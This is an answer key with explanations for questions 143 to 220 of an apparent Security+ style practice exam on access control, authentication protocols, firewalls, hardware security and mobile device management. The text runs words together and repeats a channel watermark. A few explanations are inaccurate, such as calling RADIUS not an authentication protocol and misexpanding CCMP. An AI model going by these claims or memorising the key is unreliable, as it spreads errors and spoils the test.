143. A. Attribute-basedaccesscontrol(ABAC)looksatagroupofattributes,inadditiontotheloginusernameandpassword,tomakedecisionsabout
Telegram Channel @nettrain
whetherornottograntaccess.Oneoftheattributesexaminedisthelocationoftheperson.Sincetheusersinthiscompanytravelfrequently,theywilloftenbeatnewlocations,andthatmightcauseABACtorejecttheirlogins.Wrongpasswordscancertainlypreventlogin,butarenotspecifictoABAC.ABACdoesnotpreventremoteaccess,andafirewallcanbeconfiguredtoallow,orprohibit,anytrafficyouwish.
144. B. SingleSign-On(SSO)isdesignedspecificallytoaddressthisriskandwouldbethemosthelpful.Usershaveonlyasinglelogontoremember;thus,theyhavenoneedtowritedownthepassword.OAuth(OpenAuthorization)isanopenstandardfortoken-basedauthenticationandauthorizationontheInternet.Itdoesnoteliminatetheuseorneedformultiplepasswords.Multifactorauthenticationhelpspreventrisksduetolostpasswords,butdoesnotremovetheneedformultiplepasswordsbyitself.SecurityAssertionMarkupLanguage(SAML)andLightweightDirectoryAccessProtocol(LDAP)donotstopusersfromneedingtoremembermultiplepasswords.
145. D. Rule-basedaccesscontrolappliesasetofrulestoanaccessrequest.Basedontheapplicationoftherules,theusermaybegivenaccesstoaspecificresourcethattheywerenotexplicitlygrantedpermissionto.MAC,DAC,androle-basedaccesscontrolwouldn’tgiveauseraccessunlessthatuserhasalreadybeenexplicitlygiventhataccess.
146. B. Segmentationneedsbetweenmultiplecloudvirtualdatacenters,thecostofoperatingthefirewallservice,andthevisibilityintotrafficprovidedbythecloudserviceproviderarealldesignelementsEdwillneedtoconsider.Hewon’t,however,needtoworryabouthardwareaccessforupdates.Instead,heislikelytoeitheruseavirtualcloudapplianceorbuilt-infirewallfunctionalityprovidedbythecloudinfrastructureserviceprovider.
147. B. Tokensarephysicaldevicesthatoftencontaincryptographicdataforauthentication.Theycanstoredigitalcertificatesforusewithauthentication.OAuth(OpenAuthorization)isanopenstandardfortoken-basedauthenticationandauthorizationontheInternet.Theuserstillmustrememberapassword.OpenIDisathird-partyauthenticationservice,andjustaswithOAuth,theuseralsostillmustrememberapassword.Role-basedaccesscontrolandrule-basedaccesscontrol(whichbothusetheacronymRBAC)areaccesscontrolmodels.
Telegram Channel @nettrain
148. A. Internalserviceslikethisarepartofanintranet,anetwork,orwebsiteonlyaccessibletoindividualsandsystemsinsideofacompany.Extranetsareprivatenetworksthatallowaccesstopartnersorcustomers,butnottothegeneralpublic.Ademilitarizedzone(DMZ)isanetworksegmentexposedtotheInternetoranotheruntrustednetwork.ATTLisanetworktermthatmeanstimetolive,anditdetermineshowmanyhopsapacketcanmakebeforeitisnolongerabletobesenttoanotherhop.
149. B. Thisquestiondescribesastatelessfirewall,whichlooksateverypackettomakedecisionsaboutwhatwillbeallowedthroughit.Statefulfirewallspayattentiontheconversationsandallowpacketsinaconversationbetweendevicestopassthroughonceithasverifiedtheinitialexchange.Next-generationfirewalls(NGFWs)buildinawidevarietyofsecurityservices.Application-layerfirewallsunderstandapplicationsthatrunthroughthemandprovidedeeperpacketanalysiscapabilitiestoblockunwantedapplicationlayertraffic.
150. C. Hardwaresecuritymodulesareavailableassmartcards,microSDcards,andUSBthumbdrivesinadditiontotheirfrequentdeploymentasappliancesinenterpriseuse.NancycouldpurchaseacertifiedandtestedMicroSDcard–basedHSMthatwouldprotectherkeysinasecureway.Anapplication-basedpublickeyinfrastructure(PKI)wouldnotprovidethesamelevelofsecurityonmostmobiledeviceswithoutspeciallydesignedhardware,whichisnotmentionedinthisproblem.OPALisahardware-basedencryptionstandardanddoesnotprovidekeymanagement,andanofflinecertificateauthority(CA)wouldnothelpinthiscircumstance.
151. D. BoththeWindowsandLinuxfilesystemsworkbasedonadiscretionaryaccesscontrolschemewherefileanddirectoryownerscandeterminewhocanaccess,change,orotherwiseworkwithfilesundertheircontrol.Role-basedaccesscontrolssystemsdeterminerightsbasedonrolesthatareassignedtousers.Rule-basedaccesscontrolsystemsuseaseriesofrulestodeterminewhichactionscanoccur,andmandatoryaccesscontrolsystemsenforcecontrolattheoperatingsystemlevel.
152. A. Restrictingeachfacultyaccountsothatitisonlyusablewhenthatparticularfacultymemberistypicallyoncampuswillpreventsomeonefromlogginginwiththataccountafterhours,eveniftheyhavethepassword.Usageauditingmaydetectmisuseofaccountsbutwillnotpreventit.Longerpasswordsareeffectivesecurity,butalongerpasswordcanstillbestolen.Credentialmanagementisalwaysagoodidea,butit
Telegram Channel @nettrain
won’taddressthisspecificissue.
153. D. Althoughnext-generationfirewallsprovidemaydefensivecapabilities,SQLinjectionisanattackinsteadofadefense.Inadditiontogeolocation,intrusiondetectionsystem(IDS)andintrusionpreventionsystem(IPS),andsandboxingcapabilities,manynext-generationfirewallsincludewebapplicationfirewalls,loadbalancing,IPreputationandURLfiltering,andantimalwareandantivirusfeatures.
154. C. Enablingstormcontrolonaswitchwilllimittheamountoftotalbandwidththatbroadcastpacketscanuse,preventingbroadcaststormsfromtakingdownthenetwork.BlockingAddressResolutionProtocol(ARP)wouldpreventsystemsfromfindingeachother,andblockingallbroadcastpacketswouldalsoblockmanyimportantnetworkfeatures.
155. B. Demilitarizedzones(DMZs)remainausefulconceptwhendesigningcloudenvironments,althoughthetechnicalimplementationmayvary,sincecloudprovidersmayhavesecurewebservices,load-balancingcapabilitiesorotherfeaturesthatmakeDMZslookdifferent.Proxyserversareusefulforcontrolling,filtering,andrelayingtraffic,buttheydonotprovidethefullsegmentationthatIsaacislookingfor.AVPCisavirtualdatacenterandwilltypicallycontainhisinfrastructurebutdoesnotspecificallyaddresstheseneeds.
156. A. Apermissionsauditwillfindwhatpermissionseachuserhasandcomparethattotheirjobrequirements.Permissionauditsshouldbeconductedperiodically.Jobrotation,thoughbeneficialforothersecurityreasons,willactuallyexacerbatethisproblem.Itisimpracticaltoforbidanyonefromeverchangingjobroles,andseparationofdutieswouldhavenoimpactonthisissue.
157. B. Susan’sbestoptionistodeployfull-diskencryption(FDE),whichwillensurethattheentiredriveisencrypted,ratherthanjustspecificfoldersorfiles.Degaussingmagneticdriveswillwipethem,ratherthanprotectingdata.
158. C. Passwordcomplexityrequiresthatpasswordshaveamixtureofuppercaseletters,lowercaseletters,numbers,andspecialcharacters.Thiswouldbethebestapproachtocorrecttheproblemdescribedinthequestion.Longerpasswordsareagoodsecuritymeasurebutwillnotcorrecttheissuepresentedhere.Changingpasswordswon’tmakethosepasswordsanystronger,andSingleSign-On(SSO)willhavenoeffectonthestrength
Telegram Channel @nettrain
ofpasswords.
159. D. WPA3’sPersonalmodereplacesthepresharedkeymodefoundinWPA2withsimultaneousauthenticationofequals.Thismakesweakpassphraseorpasswordattackshardertoconductandallowsforgreatersecuritywhendevicesareconductingtheirinitialkeyexchange.WEP,WPA,andWPA2donotimplementSAE.
160. C. Meganhascreatedaguestaccount.Guestaccountstypicallyhaveverylimitedprivilegesandmaybesetupwithlimitedloginhours,anexpirationdate,orothercontrolstohelpkeepthemmoresecure.Useraccountsarethemostcommontypeofaccountandareissuedtoindividualstoallowthemtologintoandusesystemsandservices.Sharedaccountsareusedbymorethanoneperson,makingitdifficulttodeterminewhousedtheaccount.Aserviceaccountistypicallyassociatedwithaprogramorservicerunningonasystemthatrequiresrightstofilesorotherresources.
161. B. APIkeysallowindividualcustomerstoauthenticatetotheAPIservice,whichmeansthatifthereisaproblemHenrycandisabletheproblematicAPIkeysratherthanallusers.EnablingloggingusingaservicelikeAmazon’sAPIGatewayallowsscalability,logging,andmonitoring,aswellastoolslikewebapplicationfirewalls.AnAPIproxyandAPI-centricintrusionpreventionsystem(IPS)weremadeupforthisquestion.
162. C. UTM,orunifiedthreatmanagement,devicescommonlyserveasfirewalls,intrusiondetectionsystem(IDS)/intrusionpreventionsystem(IPS),antivirus,webproxies,webapplicationanddeeppacketinspection,secureemailgateways,datalossprevention(DLP),securityinformationandeventmanagement(SIEM),andevenvirtualprivatenetworking(VPN)devices.Theyaren’tmobiledevicemanagement(MDM)oruniversalendpointmanagementdevices,however,sincetheirprimaryfocusisonnetworksecurity,notsystemsordevicemanagement.
163. B. Mandatoryaccesscontrol(MAC)isbasedondocumentedsecuritylevelsassociatedwiththeinformationbeingaccessed.Role-basedaccesscontrol(RBAC)isbasedontheroletheuserisplacedin.Discretionaryaccesscontrol(DAC)letsthedataownersetaccesscontrol.BACisnotanaccesscontrolmodel.
164. A. Thisimageshowsaforwardproxy,whichcanbeusedtoapplypoliciestouserrequestssenttowebserversandotherservices.Reverseproxiesactasgatewaysbetweenusersandapplicationservers,allowingcontent
Telegram Channel @nettrain
cachingandtrafficmanipulation.Theyareoftenusedbycontentdeliverynetworkstohelpwithtrafficmanagement.
165. B. Thistypeofpotentialsecurityissueistypicallyrecordedasanimpossibletraveltime/riskyloginissue.Gurvinderwouldnotexpecttheusertohavetraveledbetweentwolocationsinanhour—infact,itisimpossibletodoso.ThatmeansheneedstocontacttheusertofindoutiftheymayhavedonesomethinglikeuseaVPN,oriftheiraccountmaybecompromised.Itispossiblethiscouldbeanissuewiththegeo-IPsystemthatGurvinder’scompanyuses,butheneedstotreatitlikeasecurityriskuntilhedeterminesotherwise,andacompromiseismorelikelyinmostcases.AmisconfiguredIPaddresswouldnotcausethisissue.
166. A. Discretionaryaccesscontrol(DAC)allowsdataownerstoassignpermissions.Role-basedaccesscontrol(RBAC)assignsaccessbasedontheroletheuserisin.Mandatoryaccesscontrol(MAC)isstricterandenforcescontrolattheOSlevel.Attribute-casedaccesscontrol(ABAC)considersvariousattributessuchaslocation,time,andcomputerinadditiontousernameandpassword.
167. A. OShardeningistheprocessofsecuringanoperatingsystembypatching,updating,andconfiguringtheoperatingsystemtobesecure.Configurationmanagementistheongoingprocessofmanagingconfigurationsforsystems,ratherthanthisinitialsecuritystep.Bothsecurityupliftandendpointlockdownweremadeupforthisquestion.
168. D. SecureLightweightDirectoryAccessProtocol(LDAPS)usesport636bydefault.DNSusesport53,LDAPuses389,andsecureHTTPusesport443.
169. C. ThebestanswerfortheneedsChrishasidentifiedisahardwaresecuritymodule,orHSM.HSMscanactasacryptographickeymanager,includingcreating,storing,andsecurelyhandlingencryptionkeysandcertificates.Theycanalsoactascryptographicaccelerators,helpingoffloadencryptionfunctionslikeTransportLayerSecurity(TLS)encryption.ATPM(TrustedPlatformModule)isadeviceusedtostorekeysforasystembutdoesnotoffloadcryptoprocessing,anditisusedforkeysonaspecificsystemratherthanbroaderuses.CPUsandGPUsmayhavecryptographicaccelerationfunctions,buttheydonotsecurelystoreormanagecertificatesandotherencryptionartifacts.
170. D. Ahost-basedintrusionpreventionsystem(HIPS)canmonitornetwork
Telegram Channel @nettrain
traffictoidentifyattacks,suspiciousbehavior,andknownbadpatternsusingsignatures.Afirewallstopstrafficbasedonrules;antimalwaretoolsarespecificallydesignedtostopmalware,notattacksandsuspiciousnetworkbehavior;andahost-basedintrusiondetectionsystem(HIDS)canonlydetect,notstop,thesebehaviors.
171. B. Role-basedaccesscontrol(RBAC)grantspermissionsbasedontheuser’spositionwithintheorganization.Mandatoryaccesscontrol(MAC)usessecurityclassificationstograntpermissions.Discretionaryaccesscontrol(DAC)allowsdataownerstosetpermissions.Attribute-basedaccesscontrol(ABAC)considersvariousattributessuchaslocation,time,andcomputer,inadditiontousernameandpassword.
172. B. Measuredbootprovidesaformofbootattestationthatrecordsinformationabouteachcomponentloadedduringthebootprocess.Thisinformationcanthenbereportedtoaserverforvalidation.Trustedbootvalidateseachcomponentagainstaknownsignature.Measuredbootdoesnotcareaboutthetimetobootup,nordoesitupdatethesystem’sUnifiedExtensibleFirmwareInterface(UEFI).
173. D. Thekeydistributioncenter(KDC)issuestickets.Theticketsaregeneratedbytheticket-grantingservice,whichisusuallypartoftheKDC.Theauthenticationservicesimplyauthenticatestheuser,X.509certificatesandcertificateauthoritiesarenotpartofKerberos,andtheticket-grantingservicedoesgeneratetheticketbuttheKDCissuesit.
174. C. Althoughpatchingdevicesisimportant,themosteffectivewaytoprotectdevicesfrombeingattackedviaadministrativeaccountbruteforcingistoplacethedevicesonaseparatemanagementvirtualLAN(VLAN)andthencontrolaccesstothatVLAN.Thiswillpreventmostattackersfrombeingabletoconnecttothedevice’sadministrativeinterfaces.Disablingadministrativeaccessmaynotbepossible,andevenifitwas,itwouldcreatesignificantproblemswhenthedevicesneededtohavechangesmadeonthem.
175. A. Whilemobiledevicemanagement(MDM)andunifiedendpointmanagement(UEM)toolsprovidemanycapabilities,carrierunlockstatusnormallyneedstobecheckedwiththecarrierifyouwanttovalidatecorporate-ownedphoneswithoutmanuallycheckingeachdevice.
176. A. Zero-trustenvironmentstypicallyhaveamorecomplexnetworkduetoincreasedsegmentationtoisolatesystemsanddevicesthathavedifferent
Telegram Channel @nettrain
securitycontexts.Zero-trustnetworksalsorequirestrongidentityandaccessmanagement,andtheyuseapplication-awarefirewallsextensivelytopreserveleastprivilege.Ofcourse,loggingandanalysisofsecurityeventsisnecessarytoensurethatissuesareidentifiedandrespondedto.
177. A. DigitalcertificatesusetheX.509standard(orthePGPstandard)andallowtheusertodigitallysignauthenticationrequests.OAuthallowsanenduser’saccountinformationtobeusedbythird-partyservices,withoutexposingtheuser’spassword.Itdoesnotusedigitalcertificatesorsupportdigitalsigning.Kerberosdoesnotusedigitalcertificates,nordoesitsupportdigitallysigning.Smartcardscancontaindigitalcertificatesbutdon’tnecessarilyhavetohavethem.
178. C. SAML(SecurityAssertionMarkupLanguage)isanExtensibleMarkupLanguage(XML)frameworkforcreatingandexchangingsecurityinformationbetweenpartnersonline.TheintegrityofusersistheweaknessintheSAMLidentitychain.Tomitigatethisrisk,SAMLsystemsneedtousetimedsessions,HTTPS,andSSL/TLS.LDAP(LightweightDirectoryAccessProtocol)isaprotocolthatenablesausertolocateindividualsandotherresourcessuchasfilesanddevicesinanetwork.TerminalAccessControllerAccessControlSystemPlus(TACACS+)isaprotocolthatisusedtocontrolaccessintonetworks.TACACS+providesauthenticationandauthorizationinadditiontoanaccountingofaccessrequestsagainstacentraldatabase.Transitivetrustisatwo-wayrelationshipthatisautomaticallycreatedbetweenaparentandachilddomaininaMicrosoftActiveDirectory(AD)forest.Itsharesresourceswithitsparentdomainbydefaultandenablesanauthenticatedusertoaccessresourcesinboththechildandparentdomains.
179. C. UEM,orunifiedendpointmanagement,managesdesktop,laptops,mobiledevices,printers,andothertypesofdevices.Mobiledevicemanagement(MDM)toolsfocusonmobiledevices.
180. B. Host-basedfirewallsarethefirststepinmostdesignswhenprotectingagainstnetwork-bornethreats.Theycanpreventunwantedtrafficfromenteringorleavingthehost,leavinglesstrafficforahost-basedintrusionpreventionsystem(HIPS)orothertoolstoanalyze.Full-diskencryption(FDE)willnotstopnetwork-bornethreats,andantivirusfocusesonpreventionofmalware,notnetworkthreatslikedenialofserviceorexploitationofvulnerableservices.
Telegram Channel @nettrain
181. A. Securitygroupsareavirtualfirewallforinstances,allowingrulestobeappliedtotrafficbetweeninstances.Dynamicresourceallocationisaconceptthatallowsresourcestobeappliedastheyareneeded,includingscalingupanddowninfrastructureandsystemsonthefly.Virtualprivatecloud(VPC)endpointsareawaytoconnecttoservicesinsideofacloudproviderwithoutanInternetgateway.Finally,instanceawarenessisaconceptthatmeansthattoolsknowaboutthedifferencesbetweeninstances,ratherthantreatingeachinstanceinascalinggroupasthesame.Thiscanbeimportantduringincidentresponseprocessesandsecuritymonitoringforscaledgroups,whereresourcesmayallappearidenticalwithoutinstanceawareness.
182. D. Althoughbuilt-inupdatetoolswillhandletheoperatingsystem,additionalsoftwareinstalledonsystemsneedstobepatchedseparately.Third-partysoftwareandfirmware,includingtheUnifiedExtensibleFirmwareInterface(UEFI)orBIOSofthesystemsthataredeployedinDerek’sorganization,willneedregularupdates.ManyorganizationsadoptpatchmanagementplatformsorsystemmanagementplatformswithpatchingcapabilitiestoensurethatthisoccursonabroaderbasisthanjustOSpatches.
183. A. IDSs,orintrusiondetectionsystems,canonlydetectunwantedandmalicioustrafficbasedonthedetectionrulesandsignaturesthattheyhave.Theycannotstoptrafficormodifyit.AnIPS,orintrusionpreventionsystem,thatisplacedinlinewithnetworktrafficcantakeactiononthattraffic.Thus,IDSsareoftenusedwhenitisnotacceptabletoblocknetworktraffic,orwhenataporothernetworkdeviceisusedtoclonetrafficforinspection.
184. C. Althoughinsiderthreatsareaconcern,they’renotanydifferentforcontainersthananyothersystem.Ensuringcontainerhostsecurity,securingthemanagementstack,andmakingsurethatnetworktraffictoandfromcontainersissecureareallcommoncontainersecurityconcerns.
185. C. Networkaddresstranslation(NAT)gatewaysallowinternalIPaddressestobehiddenfromtheoutside,preventingdirectconnectionstosystemsbehindthem.ThiseffectivelyfirewallsinboundtrafficunlessthegatewayissettopasstraffictoaninternalhostwhenaspecificIP,port,andprotocolisused.Theyarenotafirewallinthetraditionalsense,however,anddonotspecificallystatefullyblocktrafficbyportandprotocol,nordotheydetectmalicioustraffic.Finally,NATgatewaysarenotusedtosend
Telegram Channel @nettrain
non-IPtrafficouttoIPnetworks.
186. C. Conditionalaccessassessesspecificconditionstomakeadeterminationaboutwhethertoallowanaccounttoaccessaresource.Thesystemmaychoosetoallowaccess,toblockaccess,ortoapplyadditionalcontrolsbasedontheconditionsthatarepresentandtheinformationthatisavailableaboutthelogin.
187. B. Ifthesystemmaintainsapasswordhistory,thatwouldpreventanyuserfromreusinganoldpassword.Passwordcomplexityandlengtharecommonsecuritysettingsbutwouldnotpreventthebehaviordescribed.Multifactorauthenticationhelpspreventbrute-forceattacksandreducesthepotentialimpactofstolenpasswordsbutwouldnothelpwiththisscenario.
188. D. BridgeProtocolDataUnit,orBDPU,guardprotectsnetworkinfrastructurebypreventingunknowndevicesfromparticipatinginspanningtree.Thatpreventsanewswitchaddedbyauserfromclaimingtobetherootbridge(inthiscase,SwitchC),whichwouldnormallycauseatopologychangeandfortraffictobesenttoSwitchX,anundesirableresult.802.11nisawirelessprotocol,andtheremainingoptionsweremadeupforthisquestion.
189. A. Thenetusercommandallowsthiscontroltobeputinplace.Althoughyoumaynotbefamiliarwiththemanynetusercommands,youcantakeoutunrealisticcommandsorcommandswithflawsinthem.Forexample,hereyoucouldlikelyguessthat-working-hoursisn’tadefinedterm.Inthesameway,loginisn’taWindowscommand,butnetcommandsarecommonlyusedtocontrolWindowssystems.
190. A. Auditingandreviewinghowusersactuallyutilizetheiraccountpermissionswouldbethebestwaytodetermineifthereisanyinappropriateuse.Aclassicexamplewouldbeabankloanofficer.Bythenatureoftheirjob,theyhaveaccesstoloandocuments.Buttheyshouldnotbeaccessingloandocumentsforloanstheyarenotservicing.Theissueinthiscaseisnotpermissions,becausetheusersrequirepermissiontoaccessthedata.Theissueishowtheusersareusingtheirpermissions.Usageauditingandpermissionsauditingarebothpartofaccountmaintenance,butauditingandreviewisabetteranswer.Finally,thisisnotapolicyissue.
191. B. AscenariosuchasguestWi-Fiaccessdoesnotprovidetheloginswithanyaccesstocorporateresources.ThepeoplelogginginmerelygettoaccesstheInternet.Thisposesverylimitedsecurityrisktothecorporate
Telegram Channel @nettrain
networkandthusisoftendonewithacommonorsharedaccount.Techsupportpersonnelgenerallyhavesignificantaccesstocorporatenetworkresources.Althoughthisisarelativelylowaccessscenario,itisstillimportanttoknowwhichspecificstudentisloggingonandaccessingwhatresources.Anylevelofaccesstocorporateresourcesshouldhaveitsownindividualloginaccount.
192. B. Certificatechainslistcertificatesandcertificateauthority(CA)certificates,allowingthosewhoreceivethecertificatetovalidatethatthecertificatescanbetrusted.Aninvalid,orbroken,chainmeansthattheuserorsystemthatischeckingthecertificatechainingshouldnottrustthesystemandcertificate.
193. D. 802.1XistheIEEEstandardforport-basednetworkaccesscontrol.Thisprotocolisfrequentlyusedtoauthenticatedevices.ChallengeHandshakeAuthenticationProtocol(CHAP)isanauthenticationprotocolbutnotthebestchoicefordeviceauthentication.Kerberosisanauthenticationprotocolbutnotthebestchoicefordeviceauthentication.802.11iistheWi-FisecuritystandardandisfullyimplementedinWPA2andWPA3.Itisnotadeviceauthenticationprocedure.
194. A. WPA2usestheAES-basedCCMP,orCounterModeBlockChainingMessageAuthentication(CBC-MAC)Protocoltoencapsulatetraffic,providingconfidentiality.WPA3alsousesCCMPastheminimumacceptableencryptioninWPA3-Personalmode.WEP,infrared,andBluetoothdonotuseCCMP.
195. A. SimpleNetworkManagementProtocol(SNMP)wouldgiveanattackeragreatdealofinformationaboutyournetwork.SNMPshouldnotbeexposedtounprotectednetworks,SNMPv3shouldbeimplemented,andSNMPsecuritybestpracticesshouldbefollowed.BothPOP3andIMAPareemailaccessprotocols,andDynamicHostConfigurationProtocol(DHCP)isusedtohandoutdynamicIPaddresses.
196. C. Accountsshouldlockoutafterasmallnumberofloginattempts.Threeisacommonnumberofattemptsbeforetheaccountislockedout.Thispreventssomeonefromjustattemptingrandomguesses.Passwordagingwillforceuserstochangetheirpasswordsbutwon’taffectpasswordguessing.Longerpasswordswouldbehardertoguess,butthisoptionisnotaseffectiveasaccountlockoutpolicies.Accountusageauditingwon’thaveanyeffectonthisissue.
Telegram Channel @nettrain
197. A. SecurityAssertionMarkupLanguage(SAML)isanXML-based,openstandardformatforexchangingauthenticationandauthorizationdatabetweenparties.OAuthallowsanenduser’saccountinformationtobeusedbythird-partyservices,withoutexposingtheuser’spassword.RADIUSisaremoteaccessprotocol.NewTechnologyLANManager(NTLM)isnotXML-based.
198. A. ChallengeHandshakeAuthenticationProtocol(CHAP)wasdesignedspecificallyforthispurpose.Itperiodicallyreauthenticates,thuspreventingsessionhijacking.NeitherPasswordAuthenticationProtocol(PAP)norTACACS+preventssessionhijacking,andRADIUSisaprotocolforremoteaccess,notauthentication.
199. C. IPSecvirtualprivatenetworks(VPNs)canmakearemotelocationappearasthoughitisconnectedtoyourlocalnetwork.SinceGregneedstorelyonastreamingsecuritycamera,analways-onIPSecVPNisthebestsolutionlisted.TLS(SSL)VPNsareprimarilyusedforspecificapplications,typicallyfocusingonwebapplications.
200. B. TheOpalstoragespecificationdefineshowtoprotectconfidentialityforstoreduserdataandhowstoragedevicesfromstoragedevicemanufacturerscanworktogether.OPALdoesnotspecifydetailsorprocessesforlicenses,accounts,andlibraries,ordegaussers.
201. B. UEFISecureBootcheckseverybinarythatisloadedduringboottomakesurethatitshashisvalid,bycheckingagainsteitheralocallytrustedcertificateorachecksumonanallowlist.Itdoesnotprotectagainstwormsthatmightattackthosebinaries,nordoesitdirectlycheckthesystemBIOSversion.
202. C. OpenIDConnectworkswiththeOAuth2.0protocolandsupportsmultipleclients,includingweb-basedandmobileclients.OpenIDConnectalsosupportsREST.ShibbolethisamiddlewaresolutionforauthenticationandidentitymanagementthatusesSAML(SecurityAssertionMarkupLanguage)andworksovertheInternet.RADIUSisaremoteaccessprotocol.OAuthallowsanenduser’saccountinformationtobeusedbythird-partyservices,withoutexposingtheuser’spassword.
203. D. Anomaly-baseddetectionsystemsbuildabehavioralbaselinefornetworksandthenassessdifferencesfromthosebaselines.Theymayuseheuristiccapabilitiesontopofthose,butthequestionspecificallyasksaboutbaselinedoperationspointingtoananomaly-basedsystem.Heuristic-
Telegram Channel @nettrain
baseddetectionslookforbehaviorsthataretypicallymalicious,andsignature-basedorhash-baseddetectionslookforknownmalicioustoolsorfiles.
204. B. ATrustedPlatformModule,orTPM,isusedasthefoundationforahardwarerootoftrustformodernPCs.TheTPMmayprovideacryptographickey;aPUF,orphysicallyunclonablefunction;oraserialnumberthatisuniquetothedevice.TheCPUandharddrivearenotusedforthisfunction,andHSMs,orhardwaresecuritymodules,areusedforpublickeyinfrastructure(PKI)andcryptographicpurposesbutnotasahardwarerootoftrustforPCs.
205. C. Next-generationfirewallstypicallybuildinadvancedcapabilitieslikeURLfiltering,blacklisting,andotherapplication-layercapabilitiesbeyondsimplepacketfilteringorstatefulpacketinspection.
206. D. Mobileapplicationmanagement(MAM)toolsarespecificallydesignedforthispurpose,andtheyallowapplicationstobedeliveredto,removedfrom,andmanagedonmobiledevices.MOMistheMicrosoftOperationsManager,asystemsmanagementtoolthatMicrosofthasreplacedwithOperationsManagerincurrentuse.MLMoftenmeansmultilevelmarketing,orpyramidschemes—notasecurityterm.MIMisnotasecurityterm.
207. A. Cloudapplicationshavemanyofthesameconcernsason-premisesapplications,butcompromiseofthesystemrunningtheapplicationduetolocalaccessisafarlesslikelyscenario.Cloudapplicationvendorsaremorelikelytooperateinsecuredatacenterswithlimitedornoaccesstotheserversexceptforauthorizedpersonnel,greatlyreducingthelikelihoodofthistypeofsecurityissue.
208. D. Themostcriticalpartofacertificateauthority(CA)isitsrootcertificate,andensuringthattherootcertificateisneverexposediscriticaltotheongoingoperatingofthatCA.Thus,rootCAsareoftenmaintainedasofflineCAs,makingitfarharderforanattackertocompromisethesystemandgainaccesstotherootcertificate.Inpractice,compromisedCAsmaylosethetrustoforganizationsaroundtheworldandbeunabletocontinuetodobusiness.
209. C. Split-tunnelVPNssendonlytrafficdestinedfortheremotenetworkovertheVPN,withallothertrafficsplitawaytousetheVPNsystemorauser’sprimarynetworkconnection.Thisreducesoveralltrafficsentthrough
Telegram Channel @nettrain
theVPNbutmeansthattrafficcannotbemonitoredandsecuredviatheVPN.Half-pipeisnotasecurityterm,andsplithorizonismostoftenusedtodescribeDNSwhereaninternalandexternalDNSviewmaybedifferent.
210. A. Loopprotectionlooksforexactlythistypeofissue.LoopprotectionsendspacketsthatincludeaPDU,orprotocoldataunit.Thesearedetectedbyothernetworkdevicesandallowthenetworkdevicestoshutdownportsfromwhichtheyreceivethosepackets.Theremainingoptionsweremadeupforthisquestion.
211. C. Over-the-air(OTA)updatesareusedbycellularcarriersaswellasphonemanufacturerstoprovidefirmwareupdatesandupdatedphoneconfigurationdata.Mobiledevicemanagement(MDM)toolscanbeusedtomonitorforthecurrentfirmwareversionandphonesettingsandwillallowCharlestodetermineifthephonesthathisstaffuseareupdatedtoensuresecurity.Anetworkaccesscontrol(NAC)agentmightcapturesomeofthisdatabutonlyfornetwork-connectedphones,whichwillnotcoveroff-sitephones,thosewithWi-Fiturnedoff,orremotedevices.OTAisnotspecificallyawaytoupdateencryptionkeys,althoughfirmwareorsettingsmightincludethem.OTAisnotsentbythephonesthemselves.
212. C. Opensourcefirewallstypicallydonothavethesamelevelofvendorsupportandmaintenancethatcommercialfirewallsdo.Thatmeansyoudon’thaveavendortoturntoifsomethinggoeswrong,andyouwillbereliantonasupportcommunityforpatchesandupdates.Opensourcefirewallsaretypicallylessexpensive,theiropensourcenaturemeansthatthecodecanbevalidatedbyanybodywhocarestoexamineit,anditcanbeacquiredasquicklyasitcanbedownloaded.
213. C. WPA3personalreplacedPSK,orpresharedkeys,withSAE,orsimultaneousauthenticationofequals.SAEhelpstopreventbrute-forceattacksagainstkeysbymakingattackersinteractwiththenetworkbeforeeachauthenticationattempt.Thisslowsdownbrute-forceattacks.WPA3alsoincludesa192-bitencryptionmode.Itdoesnotreplace64-bitencryptionwith128-bitencryption,addper-channelsecurity,oradddistributeddenial-of-service(DDoS)monitoringandprevention.
214. B. SecurityEnhancedLinux(SELinux)allowsmandatoryaccesscontrolforLinux-basedsystems,andSEAndroidisanAndroidimplementationofSELinux.ThatmeansthatIsaaccanuseSEAndroidtoaccomplishhisgoals.Androiddoesusearegistry,butthereisnoMACmode.MACDroid
Telegram Channel @nettrain
wasmadeupforthisquestion,andsingle-usermodedoesnotmakeAndroidaMAC-basedsystem.
215. B. Thesystemdescribedisaprivilegedaccessmanagement(PAM)system.PAMsystemsareusedtomanageandcontrolprivilegedaccountssecurely.MACisanaccesscontrolschemethatenforcesaccessattheOSlevel.FDEisfull-diskencryption,andTLSisTransportLayerSecurity.
216. A. Usingamobiledevicemanagement(MDM)toolthatallowscontrolofthedeviceswouldallowAlainatolockoutthecameras,preventingstaffmembersfromusingtheAndroidtabletstotakepictures.Shewouldstillneedtoensurethatherstaffdidnotbringtheirowncameraequippeddevicesintothefacility.DLPisdatalossprevention,OPALisanencryptionstandardfordrives,andMMChasanumberofmeanings,includingmultimediacardsandMicrosoftManagementConsolesnap-insforWindowssystems,noneofwhichwouldprovidethecontrolsheneeds.
217. C. Auniversalendpointmanagement(UEM)toolcanmanagedesktops,laptops,mobiledevices,printers,andotherdevices.UEMtoolsoftenuseapplicationsdeployedtomobiledevicestoconfigureandmanagethem,andOlivia’sbestoptionfromthislistisaUEMtool.ACASBisacloudaccesssecuritybrokerandisnotusedtomanagemobiledevices,andtheotheroptionsrequiremassiveamountsofmanualworkandareunlikelytosucceed—oruserswillsimplychangesettingswhenitisconvenienttothem.
218. C. Next-generation(NG)securewebgateways(SWG)addadditionalfeaturesbeyondthosefoundincloudaccesssecuritybrokersandnextgenerationfirewalls.Whilefeaturescanvary,theymayincludewebfiltering,TLSdecryptiontoallowtrafficanalysisandadvancedthreatprotection,cloudaccesssecuritybroker(CASB)features,datalossprevention(DLP),andotheradvancedcapabilities.Thistypeofsolutionisarelativelynewone,andthemarketischangingquickly.
219. C. Accesspoliciesarebuiltusinginformationandattributesaboutaccessrequests.Ifthepolicyrequirementsaremet,theactionslikeallowingordenyingaccess,orrequiringadditionalauthenticationstepscanbeperformed.Geolocationandtime-basedloginsfocusonasingleinformationcomponent,andaccountauditingisusedtoreviewpermissionsforaccounts,nottoperformthistypeofvalidationorpolicy-basedcontrol.
220. B. Numericrepresentationsoffilepermissionsarecommonlyusedinstead
Telegram Channel @nettrain
ofusingrwxnotationwithchmod.A7setsfullpermissions,andthefirstnumbersetstheuser’srights,meaningthatheretheuserwillbegrantedfullaccesstothefile.
